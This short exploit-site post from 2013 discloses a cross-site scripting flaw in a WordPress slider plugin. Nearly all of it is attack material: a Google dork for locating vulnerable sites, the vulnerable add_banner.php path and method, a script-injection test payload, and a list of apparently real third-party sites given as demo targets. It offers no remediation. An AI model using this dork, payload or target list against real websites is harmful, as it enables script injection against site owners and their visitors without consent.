Home / exploits Wordpress lbg zoominoutslider Plugin Cross site scripting Vulnerability
Posted on 25 September 2013
####################################################################### # Exploit Title : Wordpress lbg zoominoutslider Plugin Cross site scripting Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Google Dork: : inurl:/wp-content/plugins/lbg_zoominoutslider # # Date: 2013/09/24 # # Vendor Homepage : http://wordpress.org # # Tested on: Windows # ############## # # Location: /wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # metod : Post # # Script for Test : "/><script>alert(1);</script> # ############## ############## # Demo: # # http://www.alpXess.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://www.crisXcts.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://www.fXv.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://www.gibneXe.org/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://wgXe.com/cms/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # ############## # # Discovered By : ACC3SS # ##############
